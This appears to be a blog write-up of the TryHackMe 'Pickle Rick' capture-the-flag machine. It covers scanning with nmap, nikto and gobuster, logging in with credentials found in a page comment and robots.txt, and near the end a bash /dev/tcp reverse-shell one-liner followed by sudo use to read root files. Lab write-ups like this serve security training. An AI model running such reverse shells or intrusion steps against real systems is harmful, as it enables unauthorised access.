“The only true wisdom is in knowing you know nothing.” - Socrates

Pickle Rick – Easy

In this post, we’ll cover another CTF machine made by TryHackme.


					nmap -sC -sV {ipaddress}

nikto -host {ipaddress}

gobuster -dir -u http://{ipaddress} -w /usr/share/wordlists/dirb/common.txt				

The results of the nmap scan showed that there are only two ports open, 22 and 80. As soon as the nmap scan was finished, I ran nikto and gobuster scans against the host.

Meanwhile, I browsed the web application to see if there was any information disclosed/hint.
Upon analysis, I found the username “R1ckRul3s” written as a comment on the home page.

Additionally, the contents of the “robots.txt” were unusual.

Further analysis found that using the username “R1ckRul3s” and contents of “robots.txt” as the password, I was able to login to the application.


Once logged in to the application, we are presented with the Command Panel, where we can run system commands. Running “ls -al” shows that there are two files “Sup3rwhatever.txt” and “clue.txt”.

Let’s read the contents of both the files:

					less Sup3rwhatever.txt

less clue.txt				

Looking around the file system, I found another file named “second ingredients” inside rick’s home directory.

I used the following commands to set up a reverse shell and get the 3rd flag.

					#Command to get reverse shell
bash -c 'bash -i >& /dev/tcp/{ipaddress}/4050 0>&1'

#List what the user can run as sudo
sudo -l

#List the contents inside the "/root" directory
sudo ls -al /root

#Get the 3rd flag value
sudo less /root/3rd.txt				

Thank you for reading and stay tuned for new write-ups.

Happy Hunting!

Posted by: infinity